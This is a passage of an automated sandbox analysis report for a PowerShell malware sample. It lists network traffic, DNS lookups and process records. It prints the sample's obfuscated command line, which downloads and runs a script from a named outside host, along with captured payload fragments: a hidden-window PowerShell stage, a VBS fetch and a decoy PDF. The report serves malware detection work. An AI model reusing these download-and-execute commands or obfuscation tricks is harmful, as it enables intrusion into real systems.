                                                              Dec 19, 2024 11:56:20.650719881 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.650773048 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.651041031 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.656965971 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.656985998 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.657077074 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.657085896 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.657273054 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.664343119 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.664356947 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.664421082 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.664428949 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.664642096 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.807638884 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.807683945 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.807730913 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.807754040 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.807771921 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.807866096 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.815140009 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.815175056 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.815212965 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.815220118 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.815257072 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.815335989 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.816059113 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.816123009 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.816129923 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.816144943 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.816178083 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.816207886 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.816446066 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:21.392179012 CET4975480192.168.2.6203.175.174.69
                                                              Dec 19, 2024 11:56:21.512140036 CET8049754203.175.174.69192.168.2.6
                                                              Dec 19, 2024 11:56:21.512227058 CET4975480192.168.2.6203.175.174.69
                                                              Dec 19, 2024 11:56:21.512423992 CET4975480192.168.2.6203.175.174.69
                                                              Dec 19, 2024 11:56:21.631963968 CET8049754203.175.174.69192.168.2.6
                                                              Dec 19, 2024 11:56:23.045954943 CET8049754203.175.174.69192.168.2.6
                                                              Dec 19, 2024 11:56:23.097244024 CET4975480192.168.2.6203.175.174.69
                                                              Dec 19, 2024 11:56:23.284553051 CET4975480192.168.2.6203.175.174.69

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 19, 2024 11:56:10.653305054 CET6104353192.168.2.61.1.1.1
                                                              Dec 19, 2024 11:56:11.439961910 CET53610431.1.1.1192.168.2.6
                                                              Dec 19, 2024 11:56:16.432821989 CET6007053192.168.2.61.1.1.1
                                                              Dec 19, 2024 11:56:17.351166010 CET53600701.1.1.1192.168.2.6
                                                              Dec 19, 2024 11:56:20.936860085 CET5798153192.168.2.61.1.1.1
                                                              Dec 19, 2024 11:56:21.391005993 CET53579811.1.1.1192.168.2.6
                                                              Dec 19, 2024 11:56:31.539947033 CET6445453192.168.2.61.1.1.1
                                                              Dec 19, 2024 11:56:46.029999018 CET4916953192.168.2.61.1.1.1

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 19, 2024 11:56:10.653305054 CET192.168.2.61.1.1.10x7fdcStandard query (0)www.al-rasikh.comA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 11:56:16.432821989 CET192.168.2.61.1.1.10xb4b7Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 11:56:20.936860085 CET192.168.2.61.1.1.10x445Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 11:56:31.539947033 CET192.168.2.61.1.1.10xcef3Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 11:56:46.029999018 CET192.168.2.61.1.1.10xac4aStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 19, 2024 11:56:11.439961910 CET1.1.1.1192.168.2.60x7fdcNo error (0)www.al-rasikh.comal-rasikh.comCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 11:56:11.439961910 CET1.1.1.1192.168.2.60x7fdcNo error (0)al-rasikh.com107.161.23.150A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 11:56:17.351166010 CET1.1.1.1192.168.2.60xb4b7No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 11:56:17.351166010 CET1.1.1.1192.168.2.60xb4b7No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 11:56:21.391005993 CET1.1.1.1192.168.2.60x445No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 11:56:31.679470062 CET1.1.1.1192.168.2.60xcef3No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 11:56:46.168411970 CET1.1.1.1192.168.2.60xac4aNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 11:56:52.819112062 CET1.1.1.1192.168.2.60x2d75No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 11:56:52.819112062 CET1.1.1.1192.168.2.60x2d75No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.al-rasikh.com
                                                              • www.astenterprises.com.pk
                                                              • www.bluemaxxlaser.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.649754203.175.174.69802744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 19, 2024 11:56:21.512423992 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                              Host: www.bluemaxxlaser.com
                                                              Connection: Keep-Alive
                                                              Dec 19, 2024 11:56:23.045954943 CET516INHTTP/1.1 404 Not Found
                                                              Date: Thu, 19 Dec 2024 10:56:22 GMT
                                                              Server: Apache
                                                              Content-Length: 315
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.649721107.161.23.1504432744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 10:56:12 UTC176OUTGET /ms/neaters.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: www.al-rasikh.com
                                                              Connection: Keep-Alive
                                                              2024-12-19 10:56:13 UTC387INHTTP/1.1 200 OK
                                                              Connection: close
                                                              content-type: text/plain
                                                              last-modified: Thu, 08 Feb 2024 03:04:57 GMT
                                                              accept-ranges: bytes
                                                              content-length: 841
                                                              date: Thu, 19 Dec 2024 10:56:12 GMT
                                                              server: LiteSpeed
                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                              2024-12-19 10:56:13 UTC841INData Raw: 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 20 68 69 64 64 65 6e 20 24 6b 69 6c 6f 34 7a 3d 69 65 78 28 24 28 27 5b 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6f 35 64 73 27 27 27 2e 52 65 70 6c 61 63 65 28 27 6f 35 64 27 2c 27 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 27 27 70 75 62 6c 69 63 27 27 29 20 2b 20 27 27 5c 5c 66 32 69 75 7a 67 2e 76 62 27 29 29 29 3b 24 66 6c 6f 6c 3d 69 65 78 28 24 28 27 5b 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6f 35 64 73 27 27 27 2e 52 65 70 6c 61 63 65 28 27 6f 35 64 27 2c 27 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 27 27 70 75 62 6c 69 63 27 27 29 20 2b 20 27 27 5c 5c 69 79 73 2e 76 62 27 29 29 29 3b 66 75 6e 63 74 69 6f 6e 20 67 65 74 69 74 28 5b 73 74 72 69 6e
                                                              Data Ascii: powershell -win hidden $kilo4z=iex($('[Environment]::GetEo5ds'''.Replace('o5d','nvironmentVariable(''public'') + ''\\f2iuzg.vb')));$flol=iex($('[Environment]::GetEo5ds'''.Replace('o5d','nvironmentVariable(''public'') + ''\\iys.vb')));function getit([strin


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.649738107.161.23.1504432744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 10:56:18 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                              Host: www.astenterprises.com.pk
                                                              Connection: Keep-Alive
                                                              2024-12-19 10:56:19 UTC217INHTTP/1.1 200 OK
                                                              Connection: close
                                                              content-type: application/pdf
                                                              last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                              accept-ranges: bytes
                                                              content-length: 871324
                                                              date: Thu, 19 Dec 2024 10:56:18 GMT
                                                              server: LiteSpeed
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                              Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                              Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                              2024-12-19 10:56:19 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                              Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                              2024-12-19 10:56:19 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                              Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                              2024-12-19 10:56:19 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                              Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                              Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                              Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                              Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                              2024-12-19 10:56:19 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                              Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                              Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:2
                                                              Start time:05:56:06
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing'))
                                                              Imagebase:0x7ff6e3d50000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:05:56:06
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff66e660000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:05:56:12
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
